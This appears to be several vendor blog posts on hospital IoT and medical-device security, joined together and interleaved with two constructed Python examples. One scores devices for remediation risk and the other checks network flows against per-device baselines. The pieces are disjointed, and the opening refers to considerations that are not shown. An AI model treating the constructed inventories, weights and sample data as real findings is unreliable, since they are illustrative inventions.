Detecting IoT and device threats is a very different animal from detecting threats that target legacy IT systems and endpoints. Typically, embedded IoT/ICS devices do not support agents and may not be visible to your IT teams or tools. Because of this gap in security, your organization may be required to incorporate IoT and device aware analytics to detect abnormal machine behavior that could help identify an attack.
This is not an area where current IT approaches can be used in the IoT/OT device environment. The requirements for these unmanaged devices are very different.
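The four considerations above all come back to one thing: an inventory rich enough to rank devices for remediation. The following is an added example, not Ordr’s product code, showing how the findings the text names (end-of-life operating systems, default credentials, devices that cannot run an agent, known CVEs, exposed services, regulated data) can be turned into a documented risk score and a prioritized list. The device records, the scoring weights, the legacy-OS list and the CVE placeholder identifiers are all constructed for illustration.

```python
"""Rank IoT/OT assets for remediation from an inventory export.

Added example, not Ordr's product code.  The device records, the scoring
weights, the legacy-OS list and the CVE placeholders are constructed for
illustration; a real deployment would source them from the inventory and
vulnerability feeds the text describes.
"""
from dataclasses import dataclass, field
from typing import List, Tuple

# Operating systems treated as end-of-life (assumption for the example).
LEGACY_OS = {"Windows XP", "Windows 7", "Windows Server 2003"}

# Services that commonly carry lateral movement or credential attacks
# when left reachable (assumption: FTP, Telnet, SMB, RDP).
HIGH_RISK_PORTS = {21, 23, 445, 3389}


@dataclass
class Device:
    name: str
    category: str                  # e.g. "imaging", "infusion pump"
    os: str
    default_credentials: bool      # still on the vendor default password
    supports_agent: bool           # can an endpoint agent be installed?
    open_ports: List[int] = field(default_factory=list)
    cves: List[str] = field(default_factory=list)   # placeholder ids only
    regulated_data: bool = False   # stores or forwards PHI/PCI data


def assess(d: Device) -> Tuple[int, List[str]]:
    """Return (score 0-100, reasons) for one device.

    Weights are arbitrary example values; the point is that each finding
    contributes a documented, explainable amount to the total.
    """
    score, reasons = 0, []
    if d.os in LEGACY_OS:
        score += 40
        reasons.append(f"end-of-life OS: {d.os}")
    if d.default_credentials:
        score += 25
        reasons.append("default credentials")
    if not d.supports_agent:
        score += 10
        reasons.append("unmanaged (no agent possible)")
    if d.cves:
        score += 5 * min(len(d.cves), 5)   # cap so CVE count cannot dominate
        reasons.append(f"{len(d.cves)} known CVE(s)")
    exposed = sorted(HIGH_RISK_PORTS.intersection(d.open_ports))
    if exposed:
        score += 5 * len(exposed)
        reasons.append(f"high-risk ports open: {exposed}")
    if d.regulated_data:
        score += 15
        reasons.append("handles regulated data")
    return min(score, 100), reasons


def prioritise(devices: List[Device]) -> List[Tuple[str, int]]:
    """Device names ordered highest risk first, ties broken by name."""
    ranked = sorted(devices, key=lambda d: (-assess(d)[0], d.name))
    return [(d.name, assess(d)[0]) for d in ranked]


def legacy_os_share(devices: List[Device]) -> float:
    """Fraction of the inventory still running an end-of-life OS."""
    if not devices:
        return 0.0
    return sum(d.os in LEGACY_OS for d in devices) / len(devices)


# Constructed sample inventory (not real devices or CVE identifiers).
SAMPLE_INVENTORY = [
    Device("mri-01", "imaging", "Windows XP", True, False,
           [445, 3389], ["CVE-PLACEHOLDER-A", "CVE-PLACEHOLDER-B"], True),
    Device("infusion-pump-07", "infusion pump", "Embedded Linux", True, False,
           [23], ["CVE-PLACEHOLDER-C"]),
    Device("nurse-ws-12", "workstation", "Windows 7", False, True,
           [445], [], True),
    Device("hvac-ctl-02", "building automation", "Embedded Linux", False, False,
           [80]),
]

if __name__ == "__main__":
    for name, score in prioritise(SAMPLE_INVENTORY):
        dev = next(d for d in SAMPLE_INVENTORY if d.name == name)
        print(f"{score:3d}  {name:18s} {'; '.join(assess(dev)[1])}")
    print(f"legacy OS share: {legacy_os_share(SAMPLE_INVENTORY):.0%}")
```

The reasons list is what an auditor or a clinical engineering team needs alongside the number: a score of 100 on its own says nothing about whether the fix is a password change, a VLAN move, or a replacement cycle.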
Lastly, Ordr can be deployed to help avoid the pain and cost of an extended audit. Like every other federal certification requirement, a third party is going to audit your company for compliance, and that will include your IoT devices, device security controls and asset inventory. Think about this from a financial perspective. With auditors, time is money. If an organization pays an auditor an hourly rate of $300 per hour, the longer it takes the auditor to review and understand your environment, including all the IoT devices, the more billable hours and costs you will accumulate. To minimize the time and costs, it makes sense to have an accurate inventory and full visibility of every asset, including IoT devices, before the auditors arrive. With auditors, nothing exists unless it is documented. Ask Ordr to assist with preparing for your CMMC and FISMA audits.
The COVID-19 pandemic is one of those black swan events that is beyond the scope of normal contingency planning and has unpredictable, long-lasting, and highly disruptive consequences. Yet amid the chaos, one thing has been completely predictable: malicious actors quickly exploiting the panic.
Not long after emergency orders were issued and the healthcare industry was preparing for the first wave of patients infected by coronavirus, malicious actors were already bombarding healthcare workers with phishing emails weaponized with ransomware, and exploiting vulnerable remote desktop systems deployed by hospitals to enable a remote workforce and then installing ransomware on hospital systems.
Ransomware is one of the more insidious attacks that can be unleashed by malicious actors. It usually enters an organization through phishing attacks or vulnerable systems deployed on a network’s perimeter. Once the ransomware gains a foothold, the infection spreads through common exploits or open shares, moving laterally from machine to machine and encrypting important data. Then, once the important data is encrypted, the attackers display a message to pay a ransom or else the data will be lost forever; that is followed by instructions for transferring money to the attackers via untraceable cryptocurrency. In most ransomware cases, the requested ransom amount increases over time in an attempt to pressure companies to act fast and pay a lower ransom payment. UCSF was recently targeted by the Netwalker ransomware and paid $1.14M to recover their data.
Hospitals and other healthcare organizations are especially susceptible because many of their mission-critical, internet-connected devices—including medical devices—run vulnerable operating systems that cannot be patched. Some examples include nursing stations that have to interact with legacy systems that, in turn, have out of date operating system requirements; or expensive imaging equipment which runs on unsupported and unpatchable versions of Windows XP. Our Rise of the Machines: 2020 Enterprise Risk and Adoption Report found that 15-19 percent of deployments had IoT devices running on legacy operating systems Windows 7 (or older).
By some estimates there are nearly 650 million IoT and IoMT devices operating in the healthcare industry right now, and 82% of healthcare organizations using IoT/IoMT devices have had those devices attacked.
When a ransomware attack happens:
Don’t Panic: If you can isolate infected machines, do it quickly. Stop the spread of ransomware by isolating those machines from the network and protecting systems with important information. It is much easier to deal with a few infected machines versus thousands, so identifying and stopping the spread of ransomware should be the primary goal after it has entered the network.
Research: Ransomware has been around for a long time. Some variants have been well-studied, and free decryption programs are available to defeat them. Once you know what variant of ransomware has hit your network, you may learn that the keys to decrypt your data are easily available and that your infection turns out to be little more than a nuisance. However, newer variants are more virulent, and use sophisticated algorithms that can’t be decrypted.
Respond: Having assessed your situation and taken the appropriate action to limit the damage, you may still find that your important data is encrypted. This is where the question, “Should I pay the ransom?” comes into play and you have decisions to make. Some points to consider:
How valuable is your lost data and can you do without it?
Do you have that data backed up and archived?
Does losing the data affected by the ransomware put the life of your business at risk?
No Guarantees: One major point to consider if you decide to pay the ransom is that, after doing so there is no guarantee of recovery. Keep in mind that attackers are criminals. They may execute an attack campaign, scoop up quick payouts, and then abandon their victims in order to leave a cold trail for investigators. The systems they’ve set up for transferring payment may not work as intended. Or, they may have never intended to cooperate with anyone who made payment in the first place.
Of course, the best thing you can do to respond to a ransomware attack is to take proactive, mitigating actions. Working with trained security experts to assess vulnerabilities, close security gaps, train employees, and put a written incident plan in place specific to your organization, and of course having a robust backup strategy for important information before an attack occurs, is your best course of action. There are many antivirus and backup tools out there that can prevent or limit the damage of a ransomware or other malware attack.
For organizations that have adopted IoT as a part of their infrastructure and technology strategy, the Ordr platform is designed to give you full visibility into all the devices connected to your network, understand their purpose and operation, and automate management and security policies to ensure maximal protection for even the most sensitive and mission critical equipment. In a worst-case scenario, Ordr can facilitate the rapid isolation and protection of infected devices.
If you have questions about your situation, or need a partner with the skills and expertise to help protect your IoT assets, let us know. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
The health sector has been undergoing a profound digital transformation in recent years. New digital technologies have allowed for important improvements in all the processes of the sector, from medical follow-ups and preventive care to improved diagnosis and patient services. The sector has also seen major improvements to its connected network, administrative and financial systems. The day-to-day life of hospitals is increasingly punctuated by digital technology and more devices are becoming smart and connected. Consider the MRI scanner, insulin pumps or other important assets that are all digitally interconnected. These devices can communicate information on their operating status, provide detailed information on patients and in some devices can even be operated remotely.
Digital transformation affects all sectors, all organizations, both public and private. Healthcare facilities are no exception, especially in terms of cyber security. This transformation of connectivity in hospitals has unfortunately been accompanied by a sharp increase in threats and risks on all the processes involved. Hackers often favor health care institutions because they know that their security investments are not necessarily prioritized and remain lower than for other industries. With hacks at hospitals, the sector can be impacted as a whole as patient confidence decreases and regulatory fines increase. We focus on vulnerabilities in this article, what it is, and how the medical industry should think about risk and some potential ways to isolate, measure and reduce vulnerabilities.
In hospitals, connected objects are everywhere while confidential patient data is becoming digitized across the board. While the rapid development of digitization and connectivity provides for improved efficiency and quality of care, the industry is now wrestling with the increase in threats and the potential risk of information breaches at these hospitals. Sensitive patient information is what cyber attackers are often after. Just recently in October, the FBI issued a warning that ransomware attacks are becoming “more targeted, sophisticated and costly, even as the overall frequency of attacks remains consistent.”
Framing Vulnerabilities at Hospitals
A vulnerability is essentially a fault or a weakness in an environment that can make the collective system unstable. This amounts to leaving, for example, a house unlocked, a door left open, a checklist incomplete. As a result, this “door” can potentially be used by hackers to access the system.
We often find vulnerabilities on computers, but vulnerabilities can increasingly be found in many other connected devices. In essence, anything that is “coded” can potentially contain vulnerabilities: including firmware, hypervisors, operating systems, libraries, and software. Vulnerabilities may also appear in the way a network or system has been configured. Once a vulnerability exists, a hacker can exploit this weakness for malicious purposes, causing damage to an organization. Every organization today faces attacks from multiple vectors, and overall protection and risk management include thoroughly understanding a system’s vulnerabilities.
At hospitals, medical devices themselves can often be the source of vulnerabilities. A study of 24 hospitals in nine countries (EMEA) found that more than half of the hospitals surveyed used standard passwords (i.e., default settings) to secure their valuable assets. Data is often the target for hackers at hospitals, and it’s a constant battle to close opened doors and to risk manage vulnerabilities.
What are hackers after? Patient data can be quite valuable and a medical record can sell for $20 to $300 on the darknet, fetching multiples more than credit card data. Hackers also want to create harm and demand ransom in return. Some hospitals have had their patient schedules pirated. Scammers in one instance contacted patients to tell them that their consultation was canceled and showed them a different contact number to reschedule an appointment. It can get worse. In 2016, 114,000 patients were contacted by a pharmaceutical company following the detection of a cyber security breach on an insulin pump model. The control box had a vulnerability that, if it had been exploited, could have allowed the patient to inject a potentially lethal dose of insulin.
Vigilance is Needed
Hospitals have to deal with many security issues, and if anything the number of incidents seems to be on the rise. This is happening while the number of devices connected to the hospital network is growing at +20% per year. Common incidents include:
Theft of scanned records containing medical history, test results, and ongoing treatments.
Misuse of social security and financial data of patients.
Partial or total interruption of access to databases.
Partial or total destruction of the information contained in the databases.
Not Easy for Hospitals
It can be particularly difficult for hospitals to close the door on vulnerabilities. Oftentimes, hospitals are working under regulatory constraints, too many disparate systems and limited overall security and network visibility. Hospitals also have to deal with the lack of resources, training, multiple remote sites, and branches. While the headquarters and data centers can be fortified, hackers are all too aware that a remote, unprotected connected site can be an easy on-ramp to the overall healthcare system, exposing yet another key vulnerability.
Cyber Risks and the Consequences, Both Direct and Indirect
Cyber criminals are ingenious and use many methods, such as phishing and cracking passwords, to get into hospital networks to reach sensitive and profitable data held by hospitals and major healthcare systems. Our next article dives deeper into specific methods of how the bad guys can get into a hospital system. What is alarming is that oftentimes, the bad guys are already in, patiently waiting to exploit vulnerabilities.
Lost Time and Asset Utilization
The goal of hackers is to slow down or paralyze the health facility’s activities until ransom payment and these cyber-extortions can provide considerable financial gains. Think not just of WannaCry but even PetyaWrap which caused Princeton Community Hospital to stop functioning. Doctors were unable to review patients’ medical history or transmit laboratory and pharmacy orders. Unable to restore services and unable to pay a ransom, Princeton Hospital resorted to using paper records. And with little choice left the hospital subsequently scrapped and rebuilt its entire network.
Cyber criminals benefit from the fact that medical equipment such as MRI, X-ray machines, scanners and other diagnostic equipment do not always benefit from optimal security, even though they are almost always connected and used often. This oversight can create security loopholes and encourages intrusions into the systems. Taking a system offline can be a big issue as oftentimes hospitals lease expensive equipment to maximize their usage.
Hidden in the Dark
Highly targeted and sophisticated, the attacks focused on hospitals are often the work of structured groups. These attackers are patient, often lurking undetected waiting to exploit a vulnerability. The goal of the attacker is to discreetly maintain access for as long as possible in order to capture strategic information in a timely manner. In some instances it can be years before an attacker surfaces.
Thinking about Proactive Protection
Businesses need cost-effective, easy-to-deploy solutions that can continually show them who and what is connected to all parts of their networks. The other critical element to consider is the ability to identify any vulnerabilities and apply remedial action proactively. Ideally, the security system will be able to regulate flow and behavior by device type, group, location, function, or application; the control is yours.
Many products today will ring the alarm that something is wrong, adding to a whole list of alarms that go off in a day at a hospital. A few will take the next necessary step forward, providing automated remediation and loop learning. What we recommend is a system that can quickly provide holistic visibility and the ability to detect exposed vulnerabilities, and that delivers intricate risk scores for priority attention and mitigation.
Increasingly, threats will become sophisticated and automated, smart enough to find the key vulnerabilities in a network. Remediation should likewise follow suit and will need to be more sophisticated and automated while leveraging machine learning and AI. The goal of this intelligent system is to deal proactively with any type of vulnerability and limit the damage before it occurs, protecting the hospital’s important business critical assets and closing the door on cyber vulnerabilities.
Hospitals see patients with viral infections on a regular basis. Most of the time, however, doctors can only treat the symptoms of the virus, and not the virus itself – that’s a job for the patient’s immune system to handle.
Similar to biological viruses, computer viruses that infect medical devices often cannot be treated directly. Once a virus creeps into the hospital system, it’s up to the system itself to fight it off. Due to the outdated nature of many of these healthcare devices, these exploits or infections are often catastrophic – causing healthcare IT and clinical/bio-meds departments to lose millions of dollars annually and putting patient care in jeopardy.
Below, we have listed a few common questions we’ve heard from our customers about the plague that is currently sweeping through healthcare IT.
Why is this even happening?
Let’s say your credit card gets stolen. You can call your bank, request a new credit card, and get whatever loss you sustained refunded, all within the same day.
If your healthcare records are stolen, you can’t deal with it as easily. A person’s health record contains highly private and sensitive information that provides a lifetime of opportunity for target exploitation. Healthcare records are up to 10 times as valuable as credit card records, making them a juicy target for opportunistic hackers.
Why can’t we sit back and let it run its course?
Every single day there are press articles on how WannaCry devastated a hospital, or a new ransomware caused operational disruption that resulted in a hospital rerouting ambulances to nearby hospitals. The symptoms of these viruses can result in the loss of millions to the healthcare industry, and cause widespread confusion and slowdown of processes in areas where quick thinking and careful treatment are necessary.
Why can’t we make our IT immune system stronger?
To bolster the “immune system” in hospital systems, IT professionals can upgrade and patch vulnerable systems and fend off the attacks and give these devices better protection. However, upgrading and patching are incredibly difficult.
Unlike the auto-upgrades you may see on your laptop, medical device upgrades require a lot more individual attention. Manufacturers have a hard time rolling out patches for millions of units in the field because medical devices are embedded systems with a multitude of software components with potential security vulnerabilities, and they also have to go through a usually long FDA approval process.
Bringing equipment back to its original operating condition and guaranteeing that it is ready for patient usage is an arduous, expensive, and time-consuming process that has no guarantee of actually working. Protecting precious medical devices is a never-ending race. They will always lag behind the computer industry for a good reason and be always vulnerable to hacking if left unattended.
Why can’t we go into full quarantine?
We live in a connected world where each and every device needs to record and report vital patient data to the healthcare management system without manual intervention. Hospitals rely on cloud-based offerings, from enhanced radiology services to thermostats that monitor and preserve medical specimens stored in freezers.
In addition, because of the high costs of equipment, many hospitals lease or rent on a regular basis. Even the people employed by a hospital are often hired contractually, and hospitals have countless visitors that cannot be screened.
With remote clinic or telemedicine-based delivery, and countless mergers and acquisitions, healthcare IT staff are always challenged to offer the best patient care.
The Vaccine or Preventive Cure:
The recommendation from the manufacturing community calls for:
a) segregating network access (segmentation),
b) blocking internet connectivity, and
c) going back to standalone mode.
This is no different than what NIST recommends, or HIPAA imposes on hospitals.
We at Ordr are trying to help with all of the recommendations here on this issue. We call our technology a “virtual-patch”. A virtual-patch provides compensating controls for the medical devices by simply programming the installed base of switches, routers, and wireless access points to:
a) reduce the exposure of devices spreading malware inside the corporate IT networks,
b) control the type and amount of external traffic from/to these medical devices, and
c) protect the precious medical devices in real time as soon as an issue arises.
Even better, as the saying goes, “prevention is better than cure”: Ordr allows IT to put preemptive controls in place that prevent malware and ransomware from gaining control of these medical devices.
It all starts with simple, diligent everyday hygiene. Having an accurate inventory and visibility on what is connecting to the network day in and day out is the key. Continuously monitoring for malware exposure or vulnerability exploits and applying preventive measures is an absolute must. Watching internet communication and restricting it to a narrow set is even more critical.
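The segmentation and “virtual-patch” controls described above, and the everyday hygiene of watching each device’s communication and restricting it to a narrow set, both reduce to the same check: does this flow match the baseline for this device class? The following is an added example, not Ordr’s product code. It keeps a small per-class baseline of allowed peers and ports, evaluates flow records against it, separates unexpected internal (east-west) traffic from unexpected internet egress, and emits vendor-neutral deny or quarantine rules an operator would translate into switch or access-point configuration. The inventory, the baseline, the internal address range and the flow records are all constructed sample data.

```python
"""Check device flows against a per-class communication baseline.

Added example, not Ordr's product code.  It models the compensating
control the text calls a "virtual patch": each device class is allowed a
narrow set of peers and ports, and everything else is flagged and turned
into a vendor-neutral rule.  Inventory, baseline, subnets and flow
records are constructed sample data.
"""
import ipaddress
from typing import Dict, List, Optional, Set, Tuple

# Address space considered internal (assumption for the example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Baseline per device class: (destination network, allowed ports, or None
# for any port).  Constructed: DICOM to the PACS subnet, pumps only to
# their gateway over TLS, workstations to internal systems plus web.
BASELINE: Dict[str, List[Tuple[str, Optional[Set[int]]]]] = {
    "imaging":       [("10.10.5.0/24", {104, 11112})],
    "infusion-pump": [("10.10.6.10/32", {443})],
    "workstation":   [("10.10.0.0/16", None), ("0.0.0.0/0", {80, 443})],
}

# Asset inventory: device address -> class (constructed).
INVENTORY: Dict[str, str] = {
    "10.20.1.15": "imaging",
    "10.20.2.40": "infusion-pump",
    "10.20.3.7":  "workstation",
}

# Flow records as (src, dst, dst_port); a flow collector would supply these.
SAMPLE_FLOWS = [
    ("10.20.1.15", "10.10.5.2",    104),   # scanner -> PACS (expected)
    ("10.20.1.15", "10.20.3.7",    445),   # scanner -> workstation SMB
    ("10.20.2.40", "198.51.100.7", 443),   # pump -> unexpected internet host
    ("10.20.3.7",  "203.0.113.9",  443),   # workstation -> web (expected)
    ("10.20.9.99", "10.10.5.2",    104),   # address missing from inventory
]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_allowed(dev_class: str, dst: str, dport: int) -> bool:
    """True if the baseline for dev_class permits dst:dport."""
    addr = ipaddress.ip_address(dst)
    for net, ports in BASELINE.get(dev_class, []):
        if addr in ipaddress.ip_network(net) and (ports is None or dport in ports):
            return True
    return False


def evaluate(flows) -> List[str]:
    """One verdict per flow: allow, block-lateral, block-internet or unknown-device."""
    verdicts = []
    for src, dst, dport in flows:
        dev_class = INVENTORY.get(src)
        if dev_class is None:
            verdicts.append("unknown-device")      # inventory gap comes first
        elif is_allowed(dev_class, dst, dport):
            verdicts.append("allow")
        elif is_internal(dst):
            verdicts.append("block-lateral")       # east-west, e.g. SMB spread
        else:
            verdicts.append("block-internet")      # unexpected egress
    return verdicts


def suggested_controls(flows) -> List[str]:
    """Vendor-neutral rules an operator would translate to ACLs or tags."""
    rules = []
    for (src, dst, dport), verdict in zip(flows, evaluate(flows)):
        if verdict == "unknown-device":
            rules.append(f"quarantine {src} until classified")
        elif verdict.startswith("block"):
            rules.append(f"deny {src} -> {dst} tcp/{dport} ({verdict})")
    return rules


if __name__ == "__main__":
    for flow, verdict in zip(SAMPLE_FLOWS, evaluate(SAMPLE_FLOWS)):
        print(f"{verdict:15s} {flow}")
    print("\n".join(suggested_controls(SAMPLE_FLOWS)))
```

Two design points are worth noting. A source address that is not in the inventory is reported before any policy check, because a baseline is meaningless for a device nobody has classified; and internal and external violations are kept apart, since the first is the spreading behaviour ransomware relies on while the second is the “watch internet communication” case, and the two usually go to different teams.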
Please stop by our booth at HIMSS 2018 to get a demo of our product that could help you along this journey. Together, we can make a change in the current landscape, much desired and way overdue. Let us stop this hacking trend once and for all; we are excited to be part of this great mission.